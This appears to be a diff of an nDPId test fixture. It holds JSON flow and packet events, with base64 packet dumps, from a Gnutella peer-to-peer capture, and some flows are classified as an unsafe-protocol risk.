+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sxxAAIAG7QgKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86640,"flow_last_seen":86640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86640,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":86640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86640,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CNAAIAGre8KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86641,"flow_last_seen":86641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86641,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":86641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86641,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vEFAAIAGZK4KAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":87610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87610,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5NAAIAGmKcKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":87611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87611,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KphAAIAGI10KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} 
+00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMpAAIAG1h0KAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068NAAIAGCc0KAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0aolAAIAGZI4KAAIP3XxCIcRqMwT80GtdAAAAAIAC+vDo1QAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNtAAIAGqL8KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":87706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":87706,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAyIAAP8G34QzRJnWCgACD4i8xGsAAAAATkS5RFAUAACB9gAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":88219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88219,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNxAAIAGqL4KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AthAAIAGwDgKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UChAAIAGv8kKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07j1AAIAGRpsKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03zxAAIAGuFcKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05t5AAIAGvPEKAAIPaJziSMRs0ArGWKhyAAAAAIAC+vAZ6QAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cchAAIAGzAoKAAIPS4VlXcRtzI\/Cd\/CCAAAAAIAC+vBzNgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88705,"flow_last_seen":88705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88705,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":88705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88705,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNJAAIAG5KYKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88706,"flow_last_seen":88706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88706,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":88706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88706,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYJAAIAGx78KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":88816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88816,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAyoAAEAGurFLhWVdCgACD8yPxG0AoxYBwnfwg2AS\/\/+AiAAAAgQFtA=="} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":88816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88816,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocclAAIAGzBUKAAIPS4VlXcRtzI\/Cd\/CDAKMWAlAQ+vCdVAAA"} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":88832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88832,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAywAAEAGIK1onOJICgACD9AKxGwApBABxlioc2AS\/\/8tOgAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":88832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88832,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5t9AAIAGvPwKAAIPaJziSMRs0ArGWKhzAKQQAlAQ+vBKBgAA"} 
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":88897,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88897,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4Ay4AAP8Bn8YKAAICCgACDwMBvHoAAAAARQAANFAnQAB\/BsDKCgACD3p1ZE7EYyMyoRe31g=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88941,"flow_last_seen":88941,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":88941,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":88941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88941,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ccwAAIARC\/gKAAIPS4VlXXAJzI8AJKBHjeQxAkkpJRz\/KX356SYEAwABAAUAAADDglFLQA=="} 
@@ -750,14 +750,14 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":89584,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":89584,"pkt":"UlQAEjUCCAAn5uVZCABFAABZcc8AAIARC9QKAAIPS4VlXXAJzI8ARbt690gxArBfVnIskre5+iSoOkQAACYAAAABR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAA=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":89584,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":89584,"pkt":"UlQAEjUCCAAn5uVZCABFAABZcdAAAIARC9MKAAIPS4VlXXAJzI8ARU1UTtkxAvX0Cql3HOwyFoQpokQAACYAAAABR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":89612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":89612,"pkt":"UlQAEjUCCAAn5uVZCABFAABZ5uQAAIAR\/LsKAAIPaJziSHAJ0AoARRIl9XkxAr8paNvEgdBJGPDFY0QAACYAAAABR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAA=="} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vEJAAIAGZK0KAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CRAAIAGre4KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sx1AAIAG7QcKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":89653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EcFAAIAG338KAAIPYPacfsRk2wZPr5++AAAAAIAC+vDbwgAAAgQFtAEDAwgBAQQC"} 
-00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89732,"flow_last_seen":89732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":89732,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":89732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89732,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqRAAIAGaH4KAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89733,"flow_last_seen":89733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":89733,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
